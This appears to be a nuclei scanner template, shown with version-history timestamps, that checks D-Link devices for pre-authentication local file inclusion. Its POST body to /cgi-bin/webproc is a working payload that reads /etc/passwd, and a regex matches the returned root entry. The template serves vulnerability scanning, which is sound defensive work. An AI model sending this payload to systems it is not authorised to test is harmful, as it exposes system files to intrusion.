nuclei-templates/misconfiguration/d-link-arbitary-fileread.yaml

35 lines
731 B
YAML
Raw Normal View History

2021-03-02 14:09:19 +00:00
id: dlink-file-read
info:
name: D-Link - Local File Inclusion
2021-03-02 14:09:19 +00:00
author: dhiyaneshDK
severity: high
description: D-Link is vulnerable to local file inclusion.
reference:
- https://suid.ch/research/DAP-2020_Preauth_RCE_Chain.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
2021-03-12 08:57:14 +00:00
tags: dlink,lfi
2021-03-02 14:09:19 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/webproc"
2021-03-02 15:44:29 +00:00
body: 'errorpage=/etc/passwd&obj-action=auth&:action=login'
matchers-condition: and
2021-03-02 14:09:19 +00:00
matchers:
2021-03-02 15:44:29 +00:00
- type: regex
regex:
- "root:.*:0:0:"
2021-03-02 14:09:19 +00:00
part: body
2021-03-02 15:44:29 +00:00
- type: status
status:
- 200
# Enhanced by mp on 2022/08/03